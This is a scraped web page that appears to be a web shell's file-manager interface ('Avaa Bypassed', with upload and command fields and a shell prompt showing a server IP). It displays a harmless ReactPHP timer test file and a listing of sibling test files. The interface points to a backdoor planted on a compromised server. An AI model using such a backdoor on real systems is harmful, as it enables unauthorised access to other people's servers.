404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.15.197.159: ~ $
<?php

namespace React\Tests\EventLoop\Timer;

use React\EventLoop\ExtEventLoop;

class ExtEventTimerTest extends AbstractTimerTest
{
    public function createLoop()
    {
        if (!extension_loaded('event')) {
            $this->markTestSkipped('ext-event tests skipped because ext-event is not installed.');
        }

        return new ExtEventLoop();
    }
}

Filemanager

Name Type Size Permission Actions
AbstractTimerTest.php File 3.5 KB 0644
ExtEvTimerTest.php File 363 B 0644
ExtEventTimerTest.php File 368 B 0644
ExtLibevTimerTest.php File 370 B 0644
ExtLibeventTimerTest.php File 387 B 0644
StreamSelectTimerTest.php File 228 B 0644
TimersTest.php File 606 B 0644